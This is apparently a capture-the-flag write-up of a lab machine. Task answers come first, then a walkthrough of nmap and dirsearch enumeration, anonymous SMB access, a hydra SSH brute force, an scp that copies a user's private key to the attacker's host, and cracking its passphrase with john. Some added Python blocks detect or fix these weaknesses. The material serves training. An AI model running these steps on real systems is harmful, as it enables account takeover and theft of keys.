This is a machine that allows you to practise web app hacking and privilege escalation.
In this set of tasks you'll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.
Credits to Josiah Pierce from Vulnhub.
No answer needed
No answer needed
What is the name of the hidden directory on the web server (enter name without /)?
development
No answer needed
jan
armando
SSH
No answer needed
kay
No answer needed
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
$ sudo nmap 10.10.50.222 -sV -p- -A -sS -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 21:36 IST
Nmap scan report for 10.10.50.222
Host is up (0.17s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 5 hops
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2024-04-04T12:16:59-04:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-04-04T16:16:59
|_ start_date: N/A
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 33.51 ms 10.17.0.1
2 ... 4
5 174.68 ms 10.10.50.222
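The SMB host-script output above already lists two hardening gaps on the target: the server accepted a guest session, and it does not require message signing on either SMB1 or SMB2. As an added example (this editor's code, not nmap's and not part of the original write-up), the block below parses NSE output of that shape and turns those lines into findings paired with the Samba smb.conf setting that closes each one. SMB_SCAN is copied from the scan above; parse_nse_blocks and assess_smb are this example's own names.

```python
"""Flag weak SMB settings reported by nmap's smb-security-mode and
smb2-security-mode scripts.

Added example, not part of the original write-up. SMB_SCAN is a copy of the
host-script lines from the scan above; the severities and the smb.conf
settings suggested as fixes are this editor's additions, not nmap output.
"""
import re

SMB_SCAN = """\
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
"""

# An NSE script header looks like "| script-name:"; body lines start with
# "|" or "|_" followed by indentation. Indentation is often lost when output
# is pasted, so headers are recognised by shape, not by column.
HEADER_RE = re.compile(r"^[A-Za-z][\w-]*:$")


def parse_nse_blocks(text):
    """Map each NSE script name to the list of its (stripped) body lines."""
    blocks, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue
        line = raw.lstrip("|_ ").rstrip()
        if HEADER_RE.match(line):
            current = line[:-1]          # drop the trailing colon
            blocks[current] = []
        elif current is not None:
            blocks[current].append(line)
    return blocks


def assess_smb(text):
    """Return findings as dicts with severity, issue and the smb.conf fix."""
    blocks = parse_nse_blocks(text)
    findings = []
    for line in blocks.get("smb-security-mode", []):
        if line.startswith("account_used:") and "guest" in line:
            findings.append({
                "severity": "medium",
                "issue": "SMB session negotiated as guest: anonymous share access is allowed",
                "fix": "set 'guest ok = no' on each share and 'restrict anonymous = 2' in [global]",
            })
        if line.startswith("message_signing:") and "disabled" in line:
            findings.append({
                "severity": "high",
                "issue": "SMB1 message signing disabled: sessions can be tampered with or relayed",
                "fix": "set 'server signing = mandatory' in [global]",
            })
    for line in blocks.get("smb2-security-mode", []):
        if "not required" in line:
            findings.append({
                "severity": "high",
                "issue": "SMB2 message signing not required",
                "fix": "set 'server signing = mandatory' in [global]",
            })
    return findings


if __name__ == "__main__":
    for f in assess_smb(SMB_SCAN):
        print(f"[{f['severity']}] {f['issue']} -> {f['fix']}")
```

Pipe in any saved nmap output (`nmap -sV --script smb-security-mode,smb2-security-mode -oN scan.txt …`, then `assess_smb(open("scan.txt").read())`); a server with `server signing = mandatory` reports "Message signing enabled and required" and produces no signing finding.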
sudo apt install dirsearch -y
$ dirsearch -u 10.10.50.222
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/death/Lab-CTF/Basic-pentesting/reports/_10.10.50.222/_24-04-04_20-30-34.txt
Target: http://10.10.50.222/
[20:30:34] Starting:
[20:30:43] 403 - 298B - /.ht_wsr.txt
[20:30:43] 403 - 301B - /.htaccess.save
[20:30:43] 403 - 303B - /.htaccess.sample
[20:30:43] 403 - 301B - /.htaccess.bak1
[20:30:43] 403 - 301B - /.htaccess.orig
[20:30:43] 403 - 302B - /.htaccess_extra
[20:30:43] 403 - 300B - /.htaccessOLD2
[20:30:43] 403 - 299B - /.htaccessBAK
[20:30:43] 403 - 299B - /.htaccess_sc
[20:30:43] 403 - 301B - /.htaccess_orig
[20:30:43] 403 - 299B - /.htaccessOLD
[20:30:43] 403 - 291B - /.htm
[20:30:43] 403 - 292B - /.html
[20:30:43] 403 - 301B - /.htpasswd_test
[20:30:43] 403 - 297B - /.htpasswds
[20:30:43] 403 - 298B - /.httr-oauth
[20:31:23] 200 - 475B - /development/   <-- the only path that returned a 200
[20:31:57] 403 - 300B - /server-status
[20:31:57] 403 - 301B - /server-status/
Task Completed
The first note is a message from K to J about the SMB and Apache configuration, so K and J are probably user names. Let's open the other one.
Again K tells J that /etc/shadow has weak credentials and the hashes are easily crackable.
sudo apt install smbclient -y
The -L option used below lists the shares the server exposes.
$ smbclient -L 10.10.50.222
Password for [WORKGROUP\death]:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
The get command downloads a file from the share:
$ smbclient //10.10.50.222/Anonymous
Password for [WORKGROUP\death]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 19 23:01:20 2018
.. D 0 Thu Apr 19 22:43:06 2018
staff.txt N 173 Thu Apr 19 22:59:55 2018
14318640 blocks of size 1024. 11087940 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
$ cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay

sudo apt install hydra -y
$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.50.222 -t 50
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 22:19:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking ssh://10.10.50.222:22/
[STATUS] 390.00 tries/min, 390 tries in 00:01h, 14344028 to do in 612:60h, 31 active
[STATUS] 229.67 tries/min, 689 tries in 00:03h, 14343733 to do in 1040:55h, 27 active
[22][ssh] host: 10.10.50.222 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 23 final worker threads did not complete until end.
[ERROR] 23 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 22:22:17
I got the password armando, so there is no firewall blocking me from brute forcing; I'm sending 50 threads at once to speed up this process.
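The hydra run above only succeeded because nothing on the target throttled or blocked a single source making hundreds of password attempts per minute. The following added example (written for this page, not part of the original write-up or of any tool it uses) shows the detection side: it parses sshd lines in auth.log format, alerts on a source IP that fails repeatedly inside a short window, and records a later successful login from that IP, which is the trace a run like the one above leaves behind. The log lines are constructed; the hostnames, PIDs, ports and IP addresses in them are made up, and parse_sshd / detect_bruteforce are this example's own names.

```python
"""Detect SSH password-guessing bursts in sshd log lines.

Added example, not part of the original write-up. SAMPLE_LOG is constructed
to resemble /var/log/auth.log on Ubuntu 16.04 (syslog format, no year);
the timestamps, PIDs and ports are made up and only loosely follow the
hydra run above.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
Apr  4 22:19:07 basic2 sshd[1201]: Failed password for jan from 10.17.120.99 port 50122 ssh2
Apr  4 22:19:07 basic2 sshd[1203]: Failed password for jan from 10.17.120.99 port 50124 ssh2
Apr  4 22:19:08 basic2 sshd[1205]: Failed password for jan from 10.17.120.99 port 50126 ssh2
Apr  4 22:19:08 basic2 sshd[1207]: Failed password for invalid user admin from 10.17.120.99 port 50128 ssh2
Apr  4 22:19:09 basic2 sshd[1209]: Failed password for jan from 10.17.120.99 port 50130 ssh2
Apr  4 22:19:09 basic2 sshd[1211]: Failed password for jan from 10.17.120.99 port 50132 ssh2
Apr  4 22:22:15 basic2 sshd[1400]: Accepted password for jan from 10.17.120.99 port 50900 ssh2
Apr  4 22:30:00 basic2 sshd[1500]: Failed password for kay from 192.168.56.102 port 40001 ssh2
Apr  4 22:31:00 basic2 sshd[1502]: Accepted publickey for kay from 192.168.56.102 port 40003 ssh2
"""

# Matches the two sshd message shapes that matter here; "invalid user" is
# what sshd prints when the account does not exist at all.
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_sshd(log_text, year=2024):
    """Return sshd authentication events in log order as dicts."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd noise (disconnects, pam messages) is ignored
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "ip": m["ip"]})
    return events


def detect_bruteforce(log_text, window_seconds=60, threshold=5):
    """Alert on any source IP with >= threshold failed logins inside a sliding
    window of window_seconds. A later 'Accepted' login from an alerted IP is
    recorded as success_after_burst, the signature of a guessed password.
    Returns {ip: alert}."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    total = defaultdict(int)      # ip -> all failures seen
    users = defaultdict(set)      # ip -> usernames tried
    alerts = {}
    for ev in parse_sshd(log_text):
        ip = ev["ip"]
        if ev["result"] == "Failed":
            total[ip] += 1
            users[ip].add(ev["user"])
            window = recent[ip]
            window.append(ev["ts"])
            while (ev["ts"] - window[0]).total_seconds() > window_seconds:
                window.popleft()  # expire failures older than the window
            if len(window) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "first_failure": window[0], "failures": 0,
                              "users": users[ip], "success_after_burst": None}
        elif ip in alerts and alerts[ip]["success_after_burst"] is None:
            alerts[ip]["success_after_burst"] = {"user": ev["user"], "method": ev["method"],
                                                 "ts": ev["ts"]}
    for ip, alert in alerts.items():
        alert["failures"] = total[ip]
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG).values():
        print(f"{alert['ip']}: {alert['failures']} failures against {sorted(alert['users'])}, "
              f"success afterwards: {alert['success_after_burst']}")
```

sshd's own MaxAuthTries (default 6) only caps guesses per connection; a tool run with -t 50 opens many connections in parallel, so a per-source limit such as fail2ban or a firewall rate limit is what actually stops this pattern, and the alert above is what should page someone when it fires.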
$ ssh jan@10.10.50.222
The authenticity of host '10.10.50.222 (10.10.50.222)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.50.222' (ED25519) to the list of known hosts.
jan@10.10.50.222's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
jan@basic2:~$ cd /home
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
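The listing shows kay's private key id_rsa with mode -rw-r--r--, readable by every local user, which is the only reason jan can copy it off the box. As an added example (this editor's code, not the write-up's), the block below audits a home directory tree for keys and secret files that group or others can read, and applies the same fix the write-up uses later (chmod 600). It rebuilds the /home/kay layout from the listing in a temporary directory with constructed file contents, so it runs without root; SENSITIVE_NAMES, audit_home, remediate and build_demo_tree are this example's own names.

```python
"""Audit home directories for private keys and secrets readable by other users.

Added example, not part of the original write-up. build_demo_tree() recreates
the /home/kay listing above (same file names and modes) in a temporary
directory with constructed contents, so the audit can run without root and
without touching a real /home.
"""
import os
import stat
import tempfile

# Names that should never be group- or world-readable. The last four are the
# history/backup files seen in the listing above; they often hold passwords.
SENSITIVE_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519",
                   "pass.bak", ".bash_history", ".viminfo", ".lesshst"}


def looks_like_private_key(path):
    """True if the file starts with a PEM/OpenSSH private key header."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(64)
    except OSError:
        return False
    return head.startswith(b"-----BEGIN ") and b"PRIVATE KEY" in head


def audit_home(root):
    """Walk root (normally /home) and report regular files that are readable by
    group or others and are either named like a secret or contain a key."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets etc. are out of scope
            if not st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
                continue  # owner-only, nothing to report
            if name in SENSITIVE_NAMES or looks_like_private_key(path):
                findings.append({
                    "path": os.path.relpath(path, root),
                    "abspath": path,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "world_readable": bool(st.st_mode & stat.S_IROTH),
                })
    return sorted(findings, key=lambda f: f["path"])


def remediate(findings):
    """Apply the fix the write-up itself uses (chmod 600). Returns files changed."""
    for f in findings:
        os.chmod(f["abspath"], 0o600)
    return len(findings)


def build_demo_tree():
    """Recreate /home/kay from the listing above under a temp dir; returns root."""
    root = tempfile.mkdtemp(prefix="home_audit_")
    kay = os.path.join(root, "kay")
    os.makedirs(os.path.join(kay, ".ssh"))
    spec = {  # relative path: (mode from the listing, constructed content)
        "pass.bak": (0o600, b"constructed placeholder, not the real file\n"),
        ".bash_history": (0o600, b"ls -la\n"),
        ".profile": (0o644, b"# constructed\n"),
        ".ssh/authorized_keys": (0o664, b"ssh-rsa AAAA... constructed kay@basic2\n"),
        ".ssh/id_rsa.pub": (0o644, b"ssh-rsa AAAA... constructed kay@basic2\n"),
        ".ssh/id_rsa": (0o644, b"-----BEGIN RSA PRIVATE KEY-----\n"
                               b"Proc-Type: 4,ENCRYPTED\nconstructed, not a real key\n"
                               b"-----END RSA PRIVATE KEY-----\n"),
    }
    for rel, (mode, data) in spec.items():
        path = os.path.join(kay, rel)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    os.chmod(os.path.join(kay, ".ssh"), 0o755)
    os.chmod(kay, 0o755)
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for f in audit_home(demo):
        print(f"{f['mode']} {f['path']} (world-readable: {f['world_readable']})")
```

On a real host, run `audit_home("/home")` as root. Note that the ssh client refuses to load an identity file that is group- or world-readable ("Permissions 0644 ... are too open"), which is why the write-up runs chmod 600 on the copied key; that client-side check protects whoever uses the key, not its owner, so the audit has to run on the server where the key lives.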
These two commands were run on the attacking machine (10.17.120.99), which has to accept SSH connections so that scp from the target can push the key to it:
$ sudo apt install openssh-client
$ sudo service ssh start
jan@basic2:/home/kay/.ssh$ scp id_rsa death@10.17.120.99:/home/death/Lab-CTF/Basic-pentesting/
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.17.120.99 (10.17.120.99)' can't be established.
ECDSA key fingerprint is SHA256:/buBatPVxdzFYyMDbKFqcBZbNSdBI/cZQ7WxNYDuVLE.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
death@10.17.120.99's password:
id_rsa 100% 3326 3.3KB/s 00:00
$ sudo apt install john -y
$ ssh2john id_rsa > rsa
$ john rsa -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (id_rsa)
1g 0:00:00:00 DONE (2024-04-04 23:08) 12.50g/s 1035Kp/s 1035Kc/s 1035KC/s bird..aries13
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
$ chmod 600 id_rsa
$ ssh kay@10.10.50.222 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$